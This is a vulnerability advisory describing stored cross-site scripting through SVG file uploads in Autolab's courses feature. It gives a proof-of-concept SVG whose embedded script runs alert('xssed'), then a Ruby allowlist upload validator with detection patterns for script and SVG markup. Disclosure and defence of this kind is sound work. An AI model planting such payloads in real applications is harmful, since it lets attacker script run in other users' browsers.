Autolab is vulnerable to stored cross-site scripting (XSS) in the file upload functionality of the courses feature. This can be used to execute an XSS attack against a victim who is a student or teacher. Proof-of-concept SVG attachment:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("xssed");
</script>
</svg>
Because other users such as students and teachers can also view attachments, this can be used to perform XSS attacks on them: the malicious JavaScript executes in their browser and can be weaponized to trick them into performing unwanted actions.
Check file types on upload and allow only the expected types. A whitelist (allowlist) based approach is recommended: verify the file type on the server side and accept or reject the file at upload time.
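One way to implement the recommended allowlist check on the server side, as an added example in Ruby (Autolab is a Rails application) that is not Autolab's own code. The allowed types, the file signatures, the marker list and the function names are assumptions chosen for illustration; the sample inputs are constructed. The check requires both the declared extension and the file's leading bytes to agree with an allowed type, and rejects anything that a browser would render as active content (SVG, HTML, script) whatever its extension.

```ruby
require "stringio"

# Allowlist of attachment types a course may accept, keyed by extension, with
# the real leading bytes (magic numbers) each type must start with. Assumed
# list for illustration; adjust to what the course actually needs.
ALLOWED_SIGNATURES = {
  "pdf"  => ["%PDF-".b],
  "png"  => ["\x89PNG\r\n\x1a\n".b],
  "jpg"  => ["\xFF\xD8\xFF".b],
  "jpeg" => ["\xFF\xD8\xFF".b],
  "zip"  => ["PK\x03\x04".b],
  "txt"  => []   # plain text has no signature; checked for binary/markup below
}.freeze

# Markers that make a browser treat a file as active content when rendered inline.
ACTIVE_CONTENT_MARKERS = [
  /\A\s*<\?xml/i, /<svg\b/i, /<script\b/i, /<!doctype\s+html/i, /<html\b/i, /<iframe\b/i
].freeze

class UploadRejected < StandardError; end

def extension_of(filename)
  ext = File.extname(filename.to_s).delete_prefix(".").downcase
  ext.empty? ? nil : ext
end

def active_content?(head)
  ACTIVE_CONTENT_MARKERS.any? { |re| head.match?(re) }
end

# Validates an upload and returns its accepted extension, or raises UploadRejected.
# `io` is any IO-like object (StringIO, Tempfile); only the first 512 bytes are read.
def validate_upload!(filename, io)
  ext = extension_of(filename)
  unless ext && ALLOWED_SIGNATURES.key?(ext)
    raise UploadRejected, "extension not allowed: #{ext.inspect}"
  end

  head = io.read(512).to_s.b
  io.rewind if io.respond_to?(:rewind)
  raise UploadRejected, "empty file" if head.empty?

  signatures = ALLOWED_SIGNATURES.fetch(ext)
  if signatures.empty?
    # .txt: must not be binary; markup disguised as text is caught below
    raise UploadRejected, "binary content in .#{ext}" if head.include?("\x00".b)
  elsif signatures.none? { |sig| head.start_with?(sig) }
    raise UploadRejected, "content does not match .#{ext}"
  end

  raise UploadRejected, "active content (SVG/HTML/script) rejected" if active_content?(head)
  ext
end

# Non-raising wrapper convenient for controllers and tests: [accepted?, detail].
def check_upload(filename, io)
  [true, validate_upload!(filename, io)]
rescue UploadRejected => e
  [false, e.message]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed samples: the SVG payload shape from the advisory, and a benign PNG header.
  svg = %(<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert("xssed")</script></svg>)
  png = "\x89PNG\r\n\x1a\n".b + "\x00" * 16
  [["chart.svg", svg], ["chart.png", svg], ["notes.txt", svg], ["logo.png", png]].each do |name, body|
    p [name, *check_upload(name, StringIO.new(body))]
  end
end
```

In a Rails controller this would be called as `validate_upload!(upload.original_filename, upload.tempfile)` on the `ActionDispatch::Http::UploadedFile` from the form. As defense in depth, serve attachments with `send_data ..., disposition: "attachment"` and an `X-Content-Type-Options: nosniff` header, so that a file which slips past the check is downloaded rather than rendered in the application's origin.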